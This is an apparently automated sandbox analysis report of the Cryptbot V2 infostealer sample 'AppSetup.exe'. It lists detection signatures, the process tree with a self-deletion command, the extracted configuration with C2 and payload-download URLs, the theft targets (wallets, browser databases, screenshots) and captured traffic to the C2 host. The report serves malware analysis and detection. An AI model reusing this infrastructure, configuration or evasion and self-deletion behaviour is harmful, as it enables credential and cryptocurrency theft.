Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AppSetup.exe

Overview

General Information

Sample Name:AppSetup.exe
Analysis ID:805090
MD5:ac6538187dc00e537682c8439edecd02
SHA1:1fd298681f569a63ed5a202fada86192a60858d4
SHA256:134ee19e860f2c229787a6e2b954c79bde7831e4865f27c00ca9c84fcb0e2c1f
Tags:exe
Infos:

Detection

Cryptbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Cryptbot
Yara detected CryptbotV2
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Hides threads from debuggers
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Tries to detect sandboxes and other dynamic analysis tools (window names)
Self deletion via cmd or bat file
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Found C&C like URL pattern
Tries to evade analysis by execution special instruction (VM detection)
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
PE file contains section with special chars
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
Sample file is different than original file name gathered from version info
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
PE file contains an invalid checksum
Drops PE files
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • AppSetup.exe (PID: 4908 cmdline: C:\Users\user\Desktop\AppSetup.exe MD5: AC6538187DC00E537682C8439EDECD02)
    • cmd.exe (PID: 5276 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\31A8B1A9C8493D8F\isotac.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 4780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • isotac.exe (PID: 1952 cmdline: C:\Users\user\AppData\Roaming\31A8B1A9C8493D8F\isotac.exe MD5: D3807676A1CA921785102367C6BD838F)
        • DpEditor.exe (PID: 5484 cmdline: C:\Users\user\AppData\Roaming\NCH Software\DrawPad\DpEditor.exe MD5: D3807676A1CA921785102367C6BD838F)
    • cmd.exe (PID: 1116 cmdline: C:\Windows\System32\cmd.exe" /c timeout -t 5 && del "C:\Users\user\Desktop\AppSetup.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 1788 cmdline: timeout -t 5 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
  • cleanup

Malware Configuration

Threatname: Cryptbot V2

{"C2 list": ["http://trenio65.top/gate.php"], "ChromeExt": "true", "HistoryEdge": "false", "HistoryChrome": "false", "Desktop": "true", "Files": "false", "CookiesOpera": "false", "EdgeDB": "true", "Opera": "false", "Chrome": "false", "Screenshot": "true", "CookiesFirefox": "false", "HistoryFirefox": "false", "Info": "true", "CookiesChrome": "false", "CookiesEdge": "false", "ChromeDB": "true", "FirefoxDB": "true", "EdgeExt": "true", "Wallet": "true", "HistoryOpera": "false", "Edge": "false", "Firefox": "false", "NTFS": "true", "PasswordFile": "_AllPasswords.txt", "InfoFile": "_Information.txt", "EdgeDBFolder": "_Edge", "ChromeDBFolder": "_Chrome", "DesktopFolder": "_Desktop", "UserAgent": "", "UAC": "true", "ExternalDownload": "http://yepugi08.top/isotac.dat", "DeleteAfterEnd": "true", "FirefoxDBFolder": "_Firefox", "ScreenFile": "$CREEN.PNG", "Prefix": "mrd-", "MessageAfterEnd": "false", "HistoryFile": "_AllHistory.txt", "FilesFolder": "_Files", "CookiesFile": "_AllCookies.txt", "Anti": "false", "WalletFolder": "_Wallet"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.283566831.000000000103D000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_CryptbotV2Yara detected CryptbotV2Joe Security
    00000000.00000003.256932747.000000000215F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CryptbotV2Yara detected CryptbotV2Joe Security
      00000000.00000003.255701367.000000000215A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CryptbotV2Yara detected CryptbotV2Joe Security
        00000000.00000003.255772726.000000000215F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CryptbotV2Yara detected CryptbotV2Joe Security
          00000000.00000003.263986675.000000000215F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CryptbotV2Yara detected CryptbotV2Joe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.AppSetup.exe.f70000.0.unpackJoeSecurity_CryptbotV2Yara detected CryptbotV2Joe Security

              Sigma Signatures

              No Sigma rule has matched

              Snort Signatures

              Timestamp:192.168.2.3171.22.30.17949703802017930 02/12/23-00:10:13.688745
              SID:2017930
              Source Port:49703
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3171.22.30.17949703802022985 02/12/23-00:10:13.688745
              SID:2022985
              Source Port:49703
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.38.8.8.857840532023883 02/12/23-00:10:13.635837
              SID:2023883
              Source Port:57840
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: AppSetup.exeReversingLabs: Detection: 28%
              Source: AppSetup.exeVirustotal: Detection: 26%Perma Link
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Roaming\31A8B1A9C8493D8F\isotac.exeReversingLabs: Detection: 76%
              Source: C:\Users\user\AppData\Roaming\NCH Software\DrawPad\DpEditor.exeReversingLabs: Detection: 76%
              Source: 11.2.DpEditor.exe.9a0000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
              Source: 3.2.isotac.exe.9b0000.0.unpackAvira: Label: TR/Crypt.XPACK.Gen2
              Source: 00000000.00000002.283566831.000000000103D000.00000004.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Cryptbot V2 {"C2 list": ["http://trenio65.top/gate.php"], "ChromeExt": "true", "HistoryEdge": "false", "HistoryChrome": "false", "Desktop": "true", "Files": "false", "CookiesOpera": "false", "EdgeDB": "true", "Opera": "false", "Chrome": "false", "Screenshot": "true", "CookiesFirefox": "false", "HistoryFirefox": "false", "Info": "true", "CookiesChrome": "false", "CookiesEdge": "false", "ChromeDB": "true", "FirefoxDB": "true", "EdgeExt": "true", "Wallet": "true", "HistoryOpera": "false", "Edge": "false", "Firefox": "false", "NTFS": "true", "PasswordFile": "_AllPasswords.txt", "InfoFile": "_Information.txt", "EdgeDBFolder": "_Edge", "ChromeDBFolder": "_Chrome", "DesktopFolder": "_Desktop", "UserAgent": "", "UAC": "true", "ExternalDownload": "http://yepugi08.top/isotac.dat", "DeleteAfterEnd": "true", "FirefoxDBFolder": "_Firefox", "ScreenFile": "$CREEN.PNG", "Prefix": "mrd-", "MessageAfterEnd": "false", "HistoryFile": "_AllHistory.txt", "FilesFolder": "_Files", "CookiesFile": "_AllCookies.txt", "Anti": "false", "WalletFolder": "_Wallet"}
              Source: AppSetup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 142.250.184.100:443 -> 192.168.2.3:49700 version: TLS 1.2
              Source: AppSetup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\AppSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\AppSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Users\user\Desktop\AppSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Users\user\Desktop\AppSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: C:\Users\user\Desktop\AppSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\AppSetup.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.3:57840 -> 8.8.8.8:53
              Source: TrafficSnort IDS: 2022985 ET TROJAN Trojan Generic - POST To gate.php with no accept headers 192.168.2.3:49703 -> 171.22.30.179:80
              Source: TrafficSnort IDS: 2017930 ET TROJAN Trojan Generic - POST To gate.php with no referer 192.168.2.3:49703 -> 171.22.30.179:80
              Found C&C like URL pattern
              Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Content-Type: multipart/form-data; boundary=wodoDh2KzHost: trenio65.topContent-Length: 863486Cache-Control: no-cache
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://trenio65.top/gate.php
              Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.google.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /gate.php HTTP/1.1Content-Type: multipart/form-data; boundary=wodoDh2KzHost: trenio65.topContent-Length: 863486Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /isotac.dat HTTP/1.1Host: yepugi08.topCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 84.21.172.16 84.21.172.16
              Source: Joe Sandbox ViewIP Address: 84.21.172.16 84.21.172.16
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
              Source: AppSetup.exeString found in binary or memory: Content-Length: Content-Type: multipart/form-data;boundary=httphttpstrue<>S-1-5-18[<apis.google.com>]/[<443>][<www.google.com>][<"facebook">][<www.facebook.com>][<TEMP>][<APPDATA>][<LOCALAPPDATA>][<USERPROFILE>];[<ExternalDownload>][<Anti>][<true>][<UserAgent>][<UAC>]runas[<NTFS>][<Prefix>][<UID: >][<UserName: >][<ComputerName: >][<Info>][<OS: >][<DateTime: >][<UserAgent: >][<Keyboard Languages: >][<Display Resolution: >][<CPU: >][<RAM: >][<GPU: >][<isGodMod: yes>][<isGodMod: no>][<isAdmin: yes>][<isAdmin: no>][<Installed software:>][<Disk:>][<Process:>][<Screenshot>][<InfoFile>][<ScreenFile>][<PasswordFile>][<ChromeDBFolder>][<ChromeExt>][<WalletFolder>][<_Chrome_profile>][<EdgeDB>][<EdgeDBFolder>][<EdgeExt>][<_Edge_profile>][<Desktop>][<DesktopFolder>][<.txt>][<Wallet>]_test.err://[<80>][<OK>][< /c >][<cmd>][<open>][<MessageAfterEnd>][<System Error>][<The application was unable to start correctly (0xc000007b). Click OK to close the application.>][<DeleteAfterEnd>][< /c timeout -t 5 && del ">]"stream endneed dictionaryfile errorstream errordata errorout of memorybuf errorversion errorparameter error equals www.facebook.com (Facebook)
              Source: AppSetup.exeString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
              Source: AppSetup.exe, 00000000.00000003.253974562.0000000002160000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.256932747.000000000215F000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.255701367.000000000215A000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.255772726.000000000215F000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.263986675.000000000215F000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.253936113.000000000215D000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000002.289740157.0000000002141000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.256907405.000000000215D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: AppSetup.exe, 00000000.00000003.282993835.0000000003C2C000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.283081330.0000000003C2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://iptc.tc4xmp
              Source: AppSetup.exe, 00000000.00000003.282993835.0000000003C2C000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.283081330.0000000003C2C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.ado/Ident
              Source: AppSetup.exe, 00000000.00000003.253936113.000000000215D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
              Source: AppSetup.exe, 00000000.00000003.256932747.000000000215F000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.255701367.000000000215A000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.255772726.000000000215F000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.263986675.000000000215F000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000002.289740157.0000000002141000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.256907405.000000000215D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://trenio65.top/gate.php
              Source: AppSetup.exe, 00000000.00000002.283566831.000000000103D000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://trenio65.top/gate.php;
              Source: AppSetup.exe, 00000000.00000002.283566831.000000000103D000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://trenio65.top/gate.php;ChromeExt
              Source: AppSetup.exe, 00000000.00000002.289740157.0000000002141000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.256907405.000000000215D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yepugi08.top/isotac.dat
              Source: AppSetup.exe, 00000000.00000003.256961512.0000000002141000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.255849617.0000000002141000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000002.289740157.0000000002141000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://yepugi08.top/isotac.dat(4
              Source: D7F.tmp.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: AppSetup.exe, 00000000.00000003.263986675.00000000021AC000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.262416299.00000000021AE000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.255667847.00000000021B3000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.260529834.00000000021AE000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000002.289740157.00000000021AC000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.253868681.000000000219F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
              Source: D7F.tmp.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: D7F.tmp.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: AppSetup.exe, 00000000.00000002.291131567.0000000004CCF000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.258253566.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, D7F.tmp.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: D7F.tmp.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: AppSetup.exe, 00000000.00000003.253868681.000000000219F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
              Source: AppSetup.exe, 00000000.00000003.263986675.00000000021AC000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.262416299.00000000021AE000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.255667847.00000000021B3000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.260529834.00000000021AE000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000002.289740157.00000000021AC000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.253868681.000000000219F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
              Source: AppSetup.exe, 00000000.00000002.291131567.0000000004CCF000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.258253566.0000000004D5F000.00000004.00000020.00020000.00000000.sdmp, D7F.tmp.0.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
              Source: AppSetup.exe, 00000000.00000002.291131567.0000000004CCF000.00000004.00000020.00020000.00000000.sdmp, AppSetup.exe, 00000000.00000003.258253566.0000000004D5F000.00000004.0